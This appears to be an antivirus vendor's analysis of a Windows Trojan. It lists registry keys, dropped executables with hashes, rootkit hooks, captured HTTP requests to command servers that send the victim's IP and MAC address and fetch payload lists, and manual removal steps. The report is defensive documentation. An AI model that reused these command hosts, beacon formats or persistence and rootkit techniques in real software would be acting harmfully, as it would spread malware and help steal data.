[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 21 DB A2 3F 50 0E C8 7F DF 1E 7E 79 39 36 07"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
The process shock.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D9 84 84 31 6F 5C 02 36 47 10 EF 6D 97 A1 DC"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"
[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"
[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
Dropped PE files
| MD5 | File path |
|---|---|
| 55a3259a59e3c8da70c31447ba869226 | c:\WINDOWS\Ymb\deskico\desk.exe |
| aa6a8b0804c64d9a744478aba1812bf3 | c:\WINDOWS\Ymb\lgsoyx.exe |
| a9e6210e1512d80655643408876f5d7c | c:\WINDOWS\Ymb\sys32\shock.dll |
| e894852596c57675446919411d8fc600 | c:\WINDOWS\Ymb\sys32\shock.exe |
| 9d7623b9a5040adb22ce80f31561ee9a | c:\WINDOWS\Ymb\sys32\urlnav.dll |
| 52b42aa6637c5e7e7a1fa38d8ad3147e | c:\WINDOWS\jwxf\MainPro.exe |
| dde8a18d882ec61bffba5ce09fd3ede8 | c:\WINDOWS\jwxf\MainProX.exe |
| 99c87fbd1328657083180cc0a1c01d01 | c:\WINDOWS\jwxf\yp.exe |
| 4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 152808 | 153088 | 4.64164 | 22ced87f8cfbeec19f10ea768b9f5033 |
| .rdata | 159744 | 20275 | 20480 | 3.68225 | 9aea8072fe8459f1fb075382c5799ef0 |
| .data | 180224 | 136672 | 5120 | 1.76573 | 5aafebbc10957e661762e0e7fadc057b |
| .rsrc | 319488 | 22204 | 22528 | 3.49153 | 0262b31b1b6e8cd4bbbefdfbece199d6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 1446584
Last-Modified: Thu, 19 Mar 2015 08:35:59 GMT
Connection: close
ETag: "550a8a6f-1612b8"
Accept-Ranges: bytes
GET /txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:26 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes
GET /txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:17 GMT
Content-Type: text/plain
Content-Length: 284000
Last-Modified: Thu, 08 Jan 2015 06:22:57 GMT
Connection: close
ETag: "54ae2241-45560"
Accept-Ranges: bytes
GET /txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
GET /desk/cfg.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 275
Accept-Ranges: bytes
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 04:49:11 GMT
Last-Modified: Fri, 27 Mar 2015 03:31:20 GMT
ETag: "5514cf08-113"
Expires: Sun, 05 Apr 2015 04:49:11 GMT
Cache-Control: max-age=86400
Age: 50667
Powered-By-ChinaCache: HIT from 060320b3SX
[ico].num=3.[0].Ico_min=178.Ico_max=178.name=.........url=hXXp://g.2ks
m.com/s/1/999/23903.html?uid=505519.[1].Box=0.Ico_min=190.Ico_max=190.
name=.........url=hXXp://uimg.1qwe3r.com/mrcode.php?ai=50511.[2].Box=0
.Ico_min=180.Ico_max=189.name=.........url=hXXp://ico1.fdc321.comt>....
GET /desk/ico/178.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:37:34 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 08 Jan 2015 09:44:44 GMT
ETag: "54ae518c-423e"
Expires: Sun, 05 Apr 2015 03:37:34 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54965
Powered-By-ChinaCache: HIT from 060320b3SX
GET /desk/ico/190.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:50:29 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 12 Feb 2015 06:55:50 GMT
ETag: "54dc4e76-423e"
Expires: Sun, 05 Apr 2015 03:50:29 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54191
Powered-By-ChinaCache: HIT from 060320b3SX
GET /desk/ico/184.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 07:24:58 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Tue, 27 Jan 2015 08:43:08 GMT
ETag: "54c74f9c-423e"
Expires: Sun, 05 Apr 2015 07:24:58 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 41322
Powered-By-ChinaCache: HIT from 060320b3SX
GET /plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Sat, 04 Apr 2015 18:52:49 GMT
Content-Type: application/octet-stream
Content-Length: 1687
Connection: close
Expires: Sat, 04 Apr 2015 18:52:49 GMT
Cache-Control: max-age=0
GET /txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:29 GMT
Content-Type: text/plain
Content-Length: 943732
Last-Modified: Fri, 03 Apr 2015 10:02:43 GMT
Connection: close
ETag: "551e6543-e6674"
Accept-Ranges: bytes
GET /txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:32 GMT
Content-Type: text/plain
Content-Length: 671336
Last-Modified: Sat, 04 Apr 2015 13:58:36 GMT
Connection: close
ETag: "551fee0c-a3e68"
Accept-Ranges: bytes
GET /txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:20 GMT
Content-Type: text/plain
Content-Length: 1160544
Last-Modified: Wed, 01 Apr 2015 09:48:49 GMT
Connection: close
ETag: "551bbf01-11b560"
Accept-Ranges: bytes
GET /txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:22 GMT
Content-Type: text/plain
Content-Length: 398688
Last-Modified: Fri, 26 Sep 2014 07:22:57 GMT
Connection: close
ETag: "54251451-61560"
Accept-Ranges: bytes
The Trojan connects to the servers at the following location(s):
MainProX.exe_600:
MainProX.exe_600_rwx_00401000_000DF000:
Explorer.EXE_880_rwx_014E0000_00004000:
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\棋牌大厅.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€Ãƒâ€™Ã‚µ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.